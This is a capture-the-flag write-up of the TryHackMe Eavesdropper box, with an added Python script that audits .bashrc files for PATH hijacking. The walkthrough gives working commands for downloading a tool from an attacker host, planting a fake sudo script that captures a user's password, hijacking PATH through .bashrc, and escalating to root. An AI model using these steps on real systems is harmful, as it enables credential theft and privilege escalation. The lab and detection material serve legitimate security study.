TryHackMe Eavesdropper Writeup

This writeup will help you solve the Eavesdropper box on TryHackMe.

TryHackMe Eavesdropper Writeup – Root Flag

Usually, we must find a way to get into the box itself. However, to complete this box, it is sufficient to capture only the root flag. First, download frank's private key; you can find it in the description of the box. Save this file as id_rsa and set its permissions to 600, which means that only the current user has read and write access to the key. Other local users must not have access to this key, which is why they are granted no permissions at all (SSH refuses to use a private key that other users can read). So first change the permissions of the key and then log in to the box.

chmod 600 id_rsa
ssh -i id_rsa frank@<BOX_IP>

Since this box is named Eavesdropper, let's have a look at the running processes. To view processes run by other users, including root, we need to transfer the pspy64 binary to the machine. You can find more information and the binary itself here. Download the binary to your local attacking machine and serve it over HTTP by running:

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
python3 -m http.server

Now move to the terminal you used to log into the machine over SSH. Run the following commands to download the pspy64 binary, change permissions, and run the binary to view the running processes.

cd /tmp/
wget http://ATTACKING_IP:8000/pspy64
chmod +x pspy64
./pspy64

After running these commands, you will see the processes running on the box popping up one after the other. The most interesting process is the following one:

CMD: UID=0     PID=662    | sudo cat /etc/shadow

As you can see, this command uses sudo and runs with the privileges of the root user (UID=0). It is strange that the root user would elevate its privileges, since it already holds the highest level of privileges on the system. However, it is possible that a cron job runs the sudo command as the current user. If so, we can create our own sudo command to elevate privileges. First, create the sudo binary:

mkdir ~/bin
vi ~/bin/sudo

After opening the vim editor, paste in the following code:

#!/bin/bash
# Read the single line fed to this fake sudo on standard input and append it to a file.
read shadow_pass
echo "$shadow_pass" >> /tmp/frank_password

This small snippet reads the line that is fed to sudo on standard input during the cat /etc/shadow command and appends it to the /tmp/frank_password file. The only step left is to make the machine prefer this sudo command over the original one. The ~/.bashrc file is a good place for that: it contains commands that run every time the current user, frank, starts an interactive shell. First, make the new sudo executable by running:

chmod +x /home/frank/bin/sudo

Next, put the following row in the /home/frank/.bashrc file:

export PATH=/home/frank/bin:$PATH

After editing the file, wait a minute and then check the contents of the /tmp/frank_password file. It should contain some sort of password. Run the following command to elevate your privileges:

sudo su

Provide the password you found in the /tmp/frank_password file. You should now be root. Run the following command to get the root flag.

cat /root/flag.txt
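The same PATH trick is easy to audit for. The following script is an added example, not part of the original writeup: it parses a user's .bashrc for lines that prepend directories to PATH, then checks whether sudo or other sensitive commands would resolve to a file outside the trusted system directories. The directory layout in demo() and the TRUSTED tuple are constructed for this example.

```python
#!/usr/bin/env python3
"""Detect PATH hijacking: an rc file prepends a user-writable directory to PATH
in which a binary shadows a privileged system command such as sudo."""
import os
import re
import stat
import tempfile

# Commands whose shadowing matters most; sudo is the one abused on the box.
WATCHED = ("sudo", "su", "passwd", "ssh")
# Usual system directories (assumed trusted here).
TRUSTED = ("/usr/local/sbin", "/usr/local/bin", "/usr/sbin", "/usr/bin", "/sbin", "/bin")
# Matches lines such as: export PATH=/home/frank/bin:$PATH
PREPEND_RE = re.compile(r"^\s*(?:export\s+)?PATH=([^\s]+?):\$PATH\s*$", re.M)


def rc_prepends(rc_text, home):
    """Directories the rc file pushes in front of PATH, with ~ and $HOME expanded."""
    dirs = []
    for m in PREPEND_RE.finditer(rc_text):
        for d in m.group(1).split(":"):
            d = home + d[1:] if d.startswith("~") else d
            dirs.append(d.replace("$HOME", home))
    return dirs


def audit(rc_text, home, trusted):
    """Return (command, path, mode) for each WATCHED command that resolves outside trusted."""
    findings = []
    search = rc_prepends(rc_text, home) + list(trusted)
    for cmd in WATCHED:
        for d in search:
            p = os.path.join(d, cmd)
            if os.path.isfile(p) and os.access(p, os.X_OK):
                if d not in trusted:
                    findings.append((cmd, p, oct(stat.S_IMODE(os.stat(p).st_mode))))
                break  # first hit wins, exactly as the shell resolves commands
    return findings


def demo():
    """Constructed layout mirroring the box: ~/bin/sudo plus a PATH prepend in .bashrc."""
    root = tempfile.mkdtemp()
    home = os.path.join(root, "home", "frank")
    sysbin = os.path.join(root, "usr", "bin")
    os.makedirs(os.path.join(home, "bin"))
    os.makedirs(sysbin)
    for p in (os.path.join(sysbin, "sudo"), os.path.join(home, "bin", "sudo")):
        with open(p, "w") as f:
            f.write("#!/bin/bash\n")
        os.chmod(p, 0o755)
    return audit("alias ll='ls -l'\nexport PATH=~/bin:$PATH\n", home, (sysbin,))


if __name__ == "__main__":
    print(demo())  # expected: one finding for sudo under .../home/frank/bin
```

On a real host, call audit() with the contents of each user's .bashrc, their home directory and TRUSTED; any finding for sudo is exactly the hijack described above.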

The Eavesdropper box was fun to root! It involved some basic Linux process management, as well as providing your own custom commands to override default binaries for the current user.
